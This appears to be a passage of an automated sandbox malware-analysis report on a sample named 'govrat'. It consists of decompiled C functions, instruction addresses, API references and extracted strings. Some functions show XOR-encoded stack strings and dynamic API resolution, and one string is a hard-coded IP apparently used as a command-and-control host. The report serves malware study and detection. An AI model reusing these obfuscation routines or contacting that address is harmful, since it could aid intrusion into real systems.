												break;
											}
											_t64 = _a4;
											if(_t64 != 0) {
												 *_t64 =  *_t64 & 0x00000000;
											}
											 *_t94 =  *_t94 + 1;
											return _t64;
											goto L82;
											L33:
										} while (_v8 != 0 || _t83 != 0x20 && _t83 != 9);
										if(_t103 != 0) {
											 *((char*)(_t103 - 1)) = 0;
										}
										goto L38;
									} else {
										_t108 = _t108 + 4;
										goto L14;
									}
								}
							}
							goto L82;
						}
						E0095115B(_t91, _t102, _t113,  *0x973240);
						 *0x973240 =  *0x973240 & 0x00000000;
						 *_t108 =  *_t108 & 0x00000000;
						 *0x976b20 = 1;
						_t53 = 0;
						goto L17;
					}
				} else {
					L3:
					_t53 = _t50 | 0xffffffff;
					L18:
					return _t53;
				}
				L82:
			}

0x009579fa
0x009579fa
0x00957a01
0x00957a03
0x00957a03
0x00957a09
0x00957a0f
0x00957a10
0x00957a14
0x00957a2e
0x00957a2e
0x00957a32
0x00000000
0x00000000
0x00957a20
0x00957a22
0x00957a22
0x00957a2a
0x00957a2a
0x00957a38
0x00957a3d
0x00957a40
0x00957a41
0x00957a49
0x00000000
0x00957a4b
0x00957a4b
0x00957a87
0x00957a55
0x00957a5d
0x00957a5e
0x00957a5e
0x00957a61
0x00957a85
0x00957a85
0x00000000
0x00957a63
0x00957a66
0x00957a6c
0x00957a6d
0x00957a71
0x00957ab8
0x00957abd
0x00957ac4
0x00957aad
0x00000000
0x00957a73
0x00957a76
0x00957a7b
0x00957a80
0x00957acb
0x00957acc
0x00957acd
0x00957ace
0x00957acf
0x00957ad0
0x00957ad5
0x00957adb
0x00957adc
0x00957adf
0x00957ae2
0x00957ae3
0x00957ae5
0x00957ae7
0x00957aea
0x00957af3
0x00957af8
0x00957afc
0x00957afc
0x00957afe
0x00957b01
0x00957b04
0x00957b16
0x00957b1a
0x00957b1e
0x00957b21
0x00957b21
0x00957b24
0x00957b2a
0x00957b33
0x00957b35
0x00957b3b
0x00957b42
0x00957b45
0x00957b45
0x00957b47
0x00957b47
0x00957b48
0x00957b4b
0x00957b50
0x00957b84
0x00000000
0x00000000
0x00000000
0x00957b06
0x00957b0b
0x00957b10
0x00957b11
0x00000000
0x00957b11
0x00957b6a
0x00957b6a
0x00000000
0x00957b6e
0x00957b77
0x00957b77
0x00957b7b
0x00000000
0x00000000
0x00957b81
0x00957b81
0x00957b8a
0x00957b94
0x00957b99
0x00957b9d
0x00957b9d
0x00957b9f
0x00957ba1
0x00957ba3
0x00957ba4
0x00000000
0x00957baa
0x00957ba8
0x00957ba9
0x00957ba9
0x00957bb2
0x00957bb7
0x00957bbd
0x00957bcb
0x00957bcd
0x00957bd5
0x00957bbf
0x00957bbf
0x00957bc5
0x00000000
0x00957bc7
0x00957bc7
0x00957bc7
0x00957bc5
0x00957bbd
0x00957bd8
0x00957bd8
0x00957bdc
0x00957bde
0x00957bde
0x00957be1
0x00957be3
0x00957be6
0x00957be6
0x00957be7
0x00957be9
0x00957bed
0x00957bed
0x00957bf0
0x00957bf4
0x00957c06
0x00957c0b
0x00957c0e
0x00957c3b
0x00957c3d
0x00957c3e
0x00957c3e
0x00957c10
0x00957c18
0x00957c1f
0x00957c22
0x00957c24
0x00957c25
0x00957c25
0x00957c2c
0x00957c2f
0x00957c2f
0x00957c40
0x00957c42
0x00957c42
0x00957c45
0x00957ba3
0x00957ba4
0x00000000
0x00957ba6
0x00957c4d
0x00957c4f
0x00957c52
0x00957c53
0x00957c53
0x00957c56
0x00957c58
0x00000000
0x00957c58
0x00957ba1
0x00000000
0x00957b8a
0x00957c60
0x00957c67
0x00957c69
0x00957c69
0x00957c6c
0x00957c6f
0x00000000
0x00957b52
0x00957b52
0x00957b64
0x00957b66
0x00957b66
0x00000000
0x00957a82
0x00957a82
0x00000000
0x00957a82
0x00957a80
0x00957a71
0x00000000
0x00957a61
0x00957a92
0x00957a97
0x00957a9e
0x00957aa1
0x00957aab
0x00000000
0x00957aab
0x00957a16
0x00957a16
0x00957a16
0x00957aaf
0x00957ab1
0x00957ab1
0x00000000

APIs

_strlen.LIBCMT ref: 00957A24

Part of subcall function 00958FD6: Sleep.KERNEL32(00000000), ref: 00958FFE

_strlen.LIBCMT ref: 00957A55

Part of subcall function 0095B01C: x_ismbbtype_l.LIBCMT ref: 0095B02A

Strings

, xrefs: 00957B58

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 0095D22E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47
library

C-Code - Quality: 61%

			E0095D22E(void* __edx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v30;
				short _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				void* __ebp;
				signed int _t22;
				_Unknown_base(*)()* _t24;
				void* _t25;
				signed int _t28;
				void* _t31;
				struct HINSTANCE__* _t34;

				_t31 = __edx;
				_push( &_v28);
				_v28 = 0x67616d49;
				_v24 = 0x706c6865;
				_v20 = 0x6c6c642e;
				_v16 = 0;
				_v48 = 0x63656843;
				_v44 = 0x6d75536b;
				_v40 = 0x7070614d;
				_v36 = 0x69466465;
				_v32 = 0x656c;
				_v30 = 0;
				_t22 = L009F6AD6( &_v28); // executed
				_t34 = _t22;
				if(_t34 != 0) {
					_t12 =  &_v48; // 0x63656843
					_t24 = GetProcAddress(_t34, _t12); // executed
					if(_t24 == 0) {
						_push(_t34);
						return L009CE3CC(_t24, __edi);
					}
					_v12 = _v12 & 0x00000000;
					_v8 = _v8 & 0x00000000;
					_t25 =  *_t24(_a4, _a8,  &_v12,  &_v8);
					_push(_t34);
					return L00A057F5(_t25, _t31, __edi);
				} else {
					_t28 = _t22 | 0xffffffff;
					return _t28;
				}
				goto L7;
			}

0x0095d22e
0x0095d238
0x0095d239
0x0095d240
0x0095d247
0x0095d24e
0x0095d252
0x0095d259
0x0095d260
0x0095d267
0x0095d26e
0x0095d274
0x0095d279
0x0095d27e
0x0095d282
0x0095d289
0x0095d28e
0x0095d296
0x0095d298
0x00000000
0x0095d299
0x0095d2a1
0x0095d2a5
0x0095d2b7
0x0095d2b9
0x0095d2bf
0x0095d284
0x0095d284
0x0095d2c5
0x0095d2c5
0x00000000

APIs

GetProcAddress.KERNEL32(00000000,CheckSumMappedFileImagehlp.dll,?,?), ref: 0095D28E

Strings

.dll, xrefs: 0095D247
CheckSumMappedFileImagehlp.dll, xrefs: 0095D289, 0095D28C

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 00962608, Relevance: 4.6, APIs: 3, Instructions: 82

C-Code - Quality: 79%

			E00962608(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* __ebp;
				char* _t24;
				void* _t25;
				intOrPtr* _t27;
				intOrPtr* _t29;
				void* _t32;
				intOrPtr* _t33;
				intOrPtr* _t35;
				intOrPtr* _t37;
				intOrPtr* _t39;
				void* _t42;
				void* _t46;
				void* _t54;

				_t24 =  &_v8;
				_push(_t24);
				_push(0x970718);
				_push(4);
				_push(0);
				_push(0x96c338);
				_push(_t24); // executed
				_t25 = E009AE582(); // executed
				_t54 = _t25;
				if(_t54 < 0) {
					L11:
					return _t54;
				}
				_t27 = _v8;
				_t43 =  *_t27;
				_t54 =  *((intOrPtr*)( *_t27 + 0x14))(_t27, 0x614);
				if(_t54 < 0) {
					L10:
					_t29 = _v8;
					 *((intOrPtr*)( *_t29 + 8))(_t29);
					goto L11;
				}
				_v16 = 0;
				_t32 = E00961EF0(_t43, _a4,  &_v16); // executed
				_t54 = _t32;
				_pop(_t46);
				if(_t54 < 0) {
					goto L10;
				}
				_v12 = 0;
				if(_a8 != 0) {
					_t42 = E00961EF0(_t46, _a8,  &_v12); // executed
					_t54 = _t42;
				}
				if(_t54 >= 0) {
					_t37 = _v8;
					_t54 =  *((intOrPtr*)( *_t37 + 0x40))(_t37, _v16, _v12, _a12, 0);
					_t39 = _v12;
					if(_t39 != 0) {
						 *((intOrPtr*)( *_t39 + 8))(_t39);
					}
				}
				_t33 = _v16;
				 *((intOrPtr*)( *_t33 + 8))(_t33);
				if(_t54 >= 0) {
					_t35 = _v8;
					_t54 =  *((intOrPtr*)( *_t35 + 0x54))(_t35);
				}
				goto L10;
			}

0x00962610
0x00962613
0x00962614
0x00962619
0x0096261d
0x0096261e
0x00962623
0x00962624
0x00962629
0x0096262d
0x009626be
0x009626c2
0x009626c2
0x00962633
0x00962636
0x00962641
0x00962645
0x009626b4
0x009626b4
0x009626ba
0x00000000
0x009626ba
0x0096264e
0x00962651
0x00962656
0x00962659
0x0096265c
0x00000000
0x00000000
0x0096265e
0x00962664
0x0096266d
0x00962674
0x00962674
0x00962678
0x0096267a
0x0096268d
0x0096268f
0x00962694
0x00962699
0x00962699
0x00962694
0x0096269c
0x009626a2
0x009626a7
0x009626a9
0x009626b2
0x009626b2
0x00000000

APIs

ObjectStublessClient10.OLE32(?,00000614,?,0096C338,00000000,00000004,00970718,?), ref: 0096263E

Part of subcall function 00961EF0: SHParseDisplayName.SHELL32(?,00000000,?,20000000,00000000), ref: 00961F09

ObjectStublessClient10.OLE32(?,?,?,?,00000000), ref: 0096268A
ObjectStublessClient10.OLE32(?), ref: 009626AF

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 00961175, Relevance: 4.6, APIs: 3, Instructions: 80
sleep

C-Code - Quality: 71%

			E00961175(short __ebx, intOrPtr __edi) {
				void* _t31;
				void* _t33;
				int _t36;
				int _t41;
				intOrPtr* _t44;
				intOrPtr* _t47;
				signed int _t51;
				void* _t53;
				WCHAR* _t59;
				void* _t60;

				_t58 = __edi;
				 *((short*)(_t60 - 0x24)) = 0x331;
				 *((short*)(_t60 - 0x26)) = 0x35f;
				 *((short*)(_t60 - 0x28)) = __ebx;
				 *((intOrPtr*)(_t60 - 0x2c)) = 0x3450343;
				 *((intOrPtr*)(_t60 - 0x30)) = 0x35e037f;
				 *((char*)(_t60 - 0x22)) = 0;
				_t51 = 0;
				do {
					 *(_t60 + _t51 * 2 - 0x30) =  *(_t60 + _t51 * 2 - 0x30) ^ 0x00000331;
					_t51 = _t51 + 1;
				} while (_t51 < 7);
				_t47 =  *((intOrPtr*)(_t60 + 8));
				 *((intOrPtr*)(_t60 - 0x10)) = _t60 - 0x30;
				 *((char*)(_t60 - 0x22)) = 1;
				 *((intOrPtr*)(_t60 - 0xc)) = __edi;
				_t31 = L0095DD8D(_t60 - 0x10,  *_t47,  *((intOrPtr*)(_t47 + 4)));
				_pop(_t53);
				if(_t31 == 0) {
					L6:
					_t58 = _t47 + 0x210;
					_t33 = E00962608(_t47 + 0x210, _t47 + 0x418,  *((intOrPtr*)(_t60 - 8))); // executed
					if(_t33 < 0) {
						L8:
						_t59 = _t47 + 8;
						L00962890(_t47, _t53, 0x331, _t58, _t59, _t58, _t59);
						_pop(_t53);
					} else {
						_t59 = _t47 + 8;
						_t41 = PathFileExistsW(_t59); // executed
						if(_t41 == 0) {
							goto L8;
						}
					}
				} else {
					_t59 = _t47 + 8;
					_push(_t59);
					_push(_t47 + 0x210);
					L009626C3(_t47, __edi, _t59);
					_pop(_t53);
					while(1) {
						_t44 =  *0x975974; // 0x1b2d78
						_push(_t59);
						if( *_t44() != 0) {
							goto L9;
						}
						Sleep(0x3e8);
						_t58 = _t58 + 1;
						if(_t58 < 2) {
							continue;
						} else {
							goto L6;
						}
						goto L9;
					}
				}
				L9:
				_t36 = PathFileExistsW(_t59); // executed
				if(_t36 != 0) {
					E0095F98B(_t47, _t58, _t59, _t59);
					_pop(_t53);
				}
				return L0098973B(E0095115B(_t53, 0x331, _t59,  *((intOrPtr*)(_t60 - 8))), 0x331);
			}

0x00961175
0x0096117c
0x00961183
0x00961189
0x0096118d
0x00961194
0x0096119b
0x0096119f
0x009611a1
0x009611a3
0x009611a8
0x009611a9
0x009611ae
0x009611b9
0x009611bf
0x009611c3
0x009611c6
0x009611cc
0x009611cf
0x00961200
0x0096120a
0x00961211
0x0096121b
0x0096122c
0x0096122c
0x00961231
0x00961237
0x0096121d
0x00961222
0x00961226
0x0096122a
0x00000000
0x00000000
0x0096122a
0x009611d1
0x009611d1
0x009611da
0x009611db
0x009611dc
0x009611e2
0x009611e3
0x009611e3
0x009611e8
0x009611ed
0x00000000
0x00000000
0x009611f4
0x009611fa
0x009611fe
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x009611fe
0x009611e3
0x00961238
0x0096123e
0x00961242
0x00961245
0x0096124a
0x0096124a
0x00961259

APIs

Sleep.KERNEL32(000003E8), ref: 009611F4

Part of subcall function 00962608: ObjectStublessClient10.OLE32(?,00000614,?,0096C338,00000000,00000004,00970718,?), ref: 0096263E
Part of subcall function 00962608: ObjectStublessClient10.OLE32(?,?,?,?,00000000), ref: 0096268A
Part of subcall function 00962608: ObjectStublessClient10.OLE32(?), ref: 009626AF

PathFileExistsW.SHLWAPI(?), ref: 00961226
PathFileExistsW.SHLWAPI(?), ref: 0096123E

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 00951734, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 80

C-Code - Quality: 100%

			E00951734(char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v24;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				void* __edi;
				intOrPtr _t28;
				signed int _t31;
				signed int _t44;
				void* _t50;
				signed int _t53;
				char _t55;

				_t44 = 7;
				_v36 = 0;
				memset( &_v32, 0, _t44 << 2);
				if(_a12 != 0) {
					_t28 = _a8;
					_t55 = _a4;
					if(_t28 == 0 || _t55 != 0) {
						_v24 = 0x42;
						_v28 = _t55;
						_v36 = _t55;
						if(_t28 <= 0x3fffffff) {
							_v32 = _t28 + _t28;
						} else {
							_v32 = 0x7fffffff;
						}
						_t31 = E00953B16(_t50,  &_v36, _a12, _a16, _a20); // executed
						_t53 = _t31;
						if(_t55 != 0) {
							_t16 =  &_v32;
							 *_t16 = _v32 - 1;
							if( *_t16 < 0) {
								L0095391C(_t50, _t53, 0,  &_v36);
							} else {
								 *_v36 = 0;
								_v36 = _v36 + 1;
							}
							_t22 =  &_v32;
							 *_t22 = _v32 - 1;
							if( *_t22 < 0) {
								L0095391C(_t50, _t53, 0,  &_v36);
							} else {
								 *_v36 = 0;
							}
							_t31 = _t53;
						}
					} else {
						 *((intOrPtr*)(E009522A2())) = 0x16;
						_t31 = E0095390C() | 0xffffffff;
					}
					return _t31;
				}
				 *((intOrPtr*)(E009522A2())) = 0x16;
				return E0095390C() | 0xffffffff;
			}

0x00951744
0x00951748
0x0095174b
0x00951750
0x0095176a
0x0095176e
0x00951773
0x0095178e
0x00951795
0x00951798
0x009517a0
0x009517ad
0x009517a2
0x009517a2
0x009517a2
0x009517bd
0x009517c5
0x009517c9
0x009517cb
0x009517cb
0x009517ce
0x009517df
0x009517d0
0x009517d3
0x009517d5
0x009517d5
0x009517e6
0x009517e6
0x009517e9
0x009517f7
0x009517eb
0x009517ee
0x009517ee
0x009517fe
0x009517fe
0x00951779
0x0095177e
0x00951789
0x00951789
0x00000000
0x00951800
0x00951757
0x00000000

APIs

__woutput_l.LIBCMT ref: 009517BD

Part of subcall function 00953B16: __isleadbyte_l.LIBCMT ref: 00953F86
Part of subcall function 00953B16: _strlen.LIBCMT ref: 009540A0
Part of subcall function 00953B16: __aulldvrm.INT64 ref: 009543DF
Part of subcall function 00953B16: _write_string.LIBCMT ref: 00954522
Part of subcall function 00953B16: _write_string.LIBCMT ref: 009545F3

Part of subcall function 0095391C: __getbuf.LIBCMT ref: 009539BB

Strings

B, xrefs: 0095178E

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 00951A39, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64

C-Code - Quality: 100%

			E00951A39(signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v24;
				signed int _v28;
				void _v32;
				signed int _v36;
				void* __edi;
				signed int _t25;
				signed int _t34;
				void _t36;
				void* _t39;
				signed int _t42;
				signed int _t44;

				_v36 = _v36 & 0x00000000;
				_t34 = 7;
				if(_a12 != memset( &_v32, 0, _t34 << 2)) {
					_t36 = _a8;
					_t44 = _a4;
					if(_t36 == 0 || _t44 != 0) {
						_v32 = 0x7fffffff;
						if(_t36 <= 0x7fffffff) {
							_v32 = _t36;
						}
						_v24 = 0x42;
						_v28 = _t44;
						_v36 = _t44;
						_t25 = E009554D3(_t39,  &_v36, _a12, _a16, _a20); // executed
						_t42 = _t25;
						if(_t44 != 0) {
							_t17 =  &_v32;
							 *_t17 = _v32 - 1;
							if( *_t17 < 0) {
								L0095391C(_t39, _t42, 0,  &_v36);
							} else {
								 *_v36 = 0;
							}
							_t25 = _t42;
						}
					} else {
						 *((intOrPtr*)(E009522A2())) = 0x16;
						_t25 = E0095390C() | 0xffffffff;
					}
					return _t25;
				}
				 *((intOrPtr*)(E009522A2())) = 0x16;
				return E0095390C() | 0xffffffff;
			}

0x00951a41
0x00951a4a
0x00951a53
0x00951a6a
0x00951a6e
0x00951a73
0x00951a93
0x00951a98
0x00951a9a
0x00951a9a
0x00951aa6
0x00951ab0
0x00951ab4
0x00951ab7
0x00951abf
0x00951ac3
0x00951ac5
0x00951ac5
0x00951ac8
0x00951ad8
0x00951aca
0x00951acd
0x00951acd
0x00951adf
0x00951adf
0x00951a79
0x00951a7e
0x00951a89
0x00951a89
0x00000000
0x00951ae1
0x00951a5a
0x00000000

APIs

__output_l.LIBCMT ref: 00951AB7

Part of subcall function 009554D3: __isleadbyte_l.LIBCMT ref: 00955866
Part of subcall function 009554D3: _strlen.LIBCMT ref: 00955A66
Part of subcall function 009554D3: __aulldvrm.INT64 ref: 00955DEA
Part of subcall function 009554D3: _write_string.LIBCMT ref: 00955F3A
Part of subcall function 009554D3: _write_string.LIBCMT ref: 00955FE1
Part of subcall function 009554D3: _write_string.LIBCMT ref: 0095600F

Part of subcall function 0095391C: __getbuf.LIBCMT ref: 009539BB

Strings

B, xrefs: 00951AA6

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 00963675, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23

C-Code - Quality: 100%

			E00963675(void* __eax, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				void* _t7;
				short _t10;
				void* _t11;
				signed int _t12;
				void* _t16;

				_t11 = __edi;
				_t2 = __eax - 1; // 0x1ff
				_t12 = _t2;
				_t10 = 0;
				_t7 = E00951805(__edi, _t12, _a4, _a8); // executed
				if(_t7 < 0) {
					L4:
					_t10 = 0x8007007a;
					goto L5;
				} else {
					_t16 = _t7 - _t12;
					if(_t16 > 0) {
						goto L4;
					} else {
						if(_t16 == 0) {
							L5:
							 *((short*)(_t11 + _t12 * 2)) = 0;
						}
					}
				}
				return _t10;
			}

0x00963675
0x0096367b
0x0096367b
0x00963682
0x00963686
0x00963690
0x0096369a
0x0096369a
0x00000000
0x00963692
0x00963692
0x00963694
0x00000000
0x00963696
0x00963696
0x0096369f
0x009636a1
0x009636a1
0x00963696
0x00963694
0x009636a9

APIs

_vswprintf_s.LIBCMT ref: 00963686

Strings

192.243.101.124, xrefs: 00963676

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 0096062C, Relevance: 3.1, APIs: 2, Instructions: 65

C-Code - Quality: 59%

			E0096062C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t24;
				void* _t25;
				short _t28;
				void* _t51;
				void* _t53;
				void* _t59;
				void* _t66;

				_t66 = __eflags;
				_t53 = __edx;
				CloseHandle( *(_t59 - 0x44));
				_push(0x2710);
				E0095D184();
				_push(_t59 - 0x458);
				_push(_t59 - 0x250);
				L00987C0F(_t59 - 0x250);
				_t24 = L00961F7B(__ebx, _t53, __edi, __esi, _t66, _t59 - 0x458);
				_t51 = _t59;
				_t67 = _t24;
				if(_t24 == 0) {
					_t25 = E0095115B(_t51, _t53, __esi, __edi);
					goto L11;
				} else {
					__eflags =  *((intOrPtr*)(__ebp + 8)) - __ebx;
					if( *((intOrPtr*)(__ebp + 8)) == __ebx) {
						L11:
						return _t25;
					} else {
						_push(__ebx);
						__eflags =  *0x9759a4 - __ebx; // 0x0
						if(__eflags == 0) {
							ExitProcess(); // executed
						}
						__eax =  *0x974f14; // 0x0
						 *__eax = 1;
						 *0x96c0c0();
						_t28 = E009602B6(0x974f18, _t67);
						_t68 = _t28;
						if(_t28 == 0) {
							 *((short*)(_t59 - 0x250)) = _t28;
							L00958BA0(_t59 - 0x24e, __ebx, 0x206);
							L009601FD(_t68, _t59 - 0x250); // executed
							_push(_t59 - 0x250);
							return L0098B346(_t59 - 0x250, _t53, __edi);
						}
						_push(__esi);
						_push(__edi);
						_push(_t59 - 0x868);
						L00962167(_t51, _t53, __edi, __esi);
						 *((short*)(_t59 - 0x458)) = 0;
						L00958BA0(_t59 - 0x456, __ebx, 0x206);
						__eflags = 0;
						 *((short*)(_t59 - 0x250)) = 0;
						L00958BA0(_t59 - 0x24e, __ebx, 0x206);
						_push(_t59 - 0x250);
						_push(_t59 - 0x458);
						_push(_t59 - 0x868);
						return L00A14979(L0095FB70(__ebx, __edi, 0x206));
					}
				}
				goto L12;
			}

0x0096062c
0x0096062c
0x0096062f
0x00960635
0x0096063a
0x00960646
0x0096064d
0x0096064f
0x0096065b
0x00960660
0x00960661
0x00960663
0x00960688
0x00000000
0x00960665
0x00960665
0x00960668
0x0096068e
0x00960692
0x0096066a
0x0096066a
0x0096066b
0x00960671
0x00960507
0x00960507
0x00960677
0x0096067c
0x009604b4
0x009604bf
0x009604c4
0x009604c6
0x009604cd
0x009604dc
0x009604e8
0x009604f6
0x00000000
0x009604f7
0x0096050d
0x0096050e
0x00960515
0x00960516
0x00960523
0x00960532
0x00960537
0x0096053a
0x00960549
0x00960557
0x0096055e
0x00960565
0x00960573
0x00960573
0x00960668
0x00000000

APIs

ExitProcess.KERNEL32(?,?,?,?), ref: 00960507
CloseHandle.KERNEL32(?), ref: 0096062F

Part of subcall function 0095D184: CloseHandle.KERNEL32(00000000), ref: 0095D1A0

Part of subcall function 00961F7B: SendMessageW.USER32(00000402,00000000,00000000,00000000), ref: 0096212D

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 00961AB7, Relevance: 3.1, APIs: 2, Instructions: 52
thread

C-Code - Quality: 57%

			E00961AB7(signed int __ebx, void* __edx, void* __edi, void* __ebp, char _a2, short _a4, short _a6, short _a8, short _a10, short _a12, short _a14, short _a16, signed int _a18, char _a104, char _a120) {
				void* _t24;
				void* _t27;
				intOrPtr* _t33;
				signed int _t35;
				void* _t46;
				intOrPtr* _t47;
				void* _t49;
				void* _t51;

				_t46 = __edi;
				_t45 = __edx;
				_t35 = __ebx;
				_pop(_t47);
				L009E14C3(_t24, __edx, _t47);
				while(1) {
					_t27 =  *_t47( &_a120, _t35, _t35, _t35); // executed
					if(_t27 == _t35) {
						break;
					}
					if(_t27 == 0xffffffff) {
						continue;
					}
					_push( &_a104);
					return L009B410C( &_a104, _t45);
				}
				_t51 =  *0x9759a4 - _t35; // 0x0
				if(_t51 != 0) {
					_t33 =  *0x974f14; // 0x0
					_push(_t35);
					 *_t33 = 1;
					RtlExitUserThread();
				}
				_a16 = 0x571;
				_a14 = 0x540;
				_a12 = 0x52b;
				_a10 = 0x522;
				_a8 = 0x534;
				_a6 = 0x536;
				_a4 = 0x529;
				_a2 = 0x535;
				_a18 = _t35;
				do {
					 *(_t49 + 0xe + _t35 * 2) =  *(_t49 + 0xe + _t35 * 2) ^ 0x00000571;
					_t35 = _t35 + 1;
				} while (_t35 < 8);
				_push(_a8);
				_push( &_a2);
				_a18 = 1;
				return L009D8084( &_a2, 0x571, _t46);
			}

0x00961ab7
0x00961ab7
0x00961ab7
0x00961ab7
0x00961ab8
0x00961ada
0x00961ae5
0x00961ae9
0x00000000
0x00000000
0x00961ac2
0x00000000
0x00000000
0x00961ac8
0x00000000
0x00961ac9
0x00961aeb
0x00961af1
0x00961af3
0x00961af8
0x00961af9
0x00961aff
0x00961aff
0x00961b0c
0x00961b14
0x00961b1c
0x00961b24
0x00961b2c
0x00961b34
0x00961b3c
0x00961b44
0x00961b49
0x00961b4d
0x00961b4f
0x00961b54
0x00961b55
0x00961b5a
0x00961b61
0x00961b62
0x00000000

APIs

KiUserCallbackDispatcher.NTDLL(?), ref: 00961AE5
RtlExitUserThread.NTDLL(?,?,?,?,?,?), ref: 00961AFF

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 00961ACF, Relevance: 3.0, APIs: 2, Instructions: 47thread

APIs

KiUserCallbackDispatcher.NTDLL(?), ref: 00961AE5
RtlExitUserThread.NTDLL(?,?,?,?,?,?), ref: 00961AFF

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
